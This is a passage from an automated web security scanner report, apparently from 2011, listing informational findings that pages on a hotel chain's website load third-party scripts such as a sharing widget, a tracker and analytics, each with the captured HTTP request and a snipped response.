The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /de/copthornehannover/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:53:47 GMT
ETag: "23932-cc02-76a1e040"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.698. http://www.millenniumhotels.com/de/millenniumstuttgart/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/de/millenniumstuttgart/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /de/millenniumstuttgart/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:45:59 GMT
ETag: "22475-cb7b-7ee88cc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.699. http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/fr/millenniumcharlesdegaulle/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /fr/millenniumcharlesdegaulle/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:44:42 GMT
ETag: "224a5-cdb2-35299cf"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.700. http://www.millenniumhotels.com/fr/millenniumparis/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/fr/millenniumparis/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /fr/millenniumparis/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:50:44 GMT
ETag: "1f3db-cca2-6bb9fe92"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.701. http://www.millenniumhotels.com/id/millenniumjakarta/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/id/millenniumjakarta/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
http://www.google-analytics.com/urchin.js

Request

GET /id/millenniumjakarta/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:13:30 GMT
ETag: "34712-e76e-e6947ee0"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59246

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.702. http://www.millenniumhotels.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:12 GMT
ETag: "32c63-2457f-3fd78d6e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 148863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.703. http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/kw/aljahrahcopthornekuwait/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme

Request

GET /kw/aljahrahcopthornekuwait/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:43:16 GMT
ETag: "21017-c821-fe36a2f1"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

18.704. http://www.millenniumhotels.com/millenniumanchorage/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumanchorage/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumanchorage/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:06 GMT
ETag: "3312f-fcd4-3f800d87"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.705. http://www.millenniumhotels.com/millenniumboston/attractions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps/api/js?sensor=false
http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/attractions/ HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:03 GMT
ETag: "339ae-1019a-922a84b5"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65946

                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...
</script>

-->
                                           <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

18.706. http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/Green_Policy.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/attractions/Green_Policy.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:03 GMT
ETag: "2d000-ee69-3f4472bd"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.707. http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/Logan_International_Airport.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/attractions/Logan_International_Airport.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:03 GMT
ETag: "339c7-eb6b-3f43bba2"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.708. http://www.millenniumhotels.com/millenniumboston/attractions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps/api/js?sensor=false
http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/attractions/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:03 GMT
ETag: "339ae-1019a-922a84b5"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65946

                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...
</script>

-->
                                           <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

18.709. http://www.millenniumhotels.com/millenniumboston/contactus/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/contactus/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/contactus/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:02 GMT
ETag: "2d004-e211-3f3d4baf"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.710. http://www.millenniumhotels.com/millenniumboston/facilities/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/facilities/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/facilities/ HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:02 GMT
ETag: "2d067-e533-3f3a6f43"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.711. http://www.millenniumhotels.com/millenniumboston/facilities/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/facilities/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/facilities/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:03 GMT
ETag: "34921-e533-922451cb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.712. http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/forms/optInForm.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/forms/optInForm.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:00 GMT
ETag: "34928-e0d3-3f22d4c8"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.713. http://www.millenniumhotels.com/millenniumboston/gallery/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/gallery/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/gallery/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:02 GMT
ETag: "33a8e-e3b2-921734dc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.714. http://www.millenniumhotels.com/millenniumboston/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumboston/index.html HTTP/1.1
Host: www.millenniumhotels.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=millenium+boston
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 01 Feb 2011 14:13:16 GMT
ETag: "33c40-f7ff-223834b1"
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:25:51 GMT
Connection: close
Content-Length: 63487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.715. http://www.millenniumhotels.com/millenniumboston/meeting/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/meeting/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/meeting/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

18.716. http://www.millenniumhotels.com/millenniumboston/news/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/news/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/news/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:00 GMT
ETag: "2a084-ea1a-3f194b60"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.717. http://www.millenniumhotels.com/millenniumboston/restaurant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/restaurant/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/restaurant/ HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:13:06 GMT
ETag: "3398e-ff86-e52fd248"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
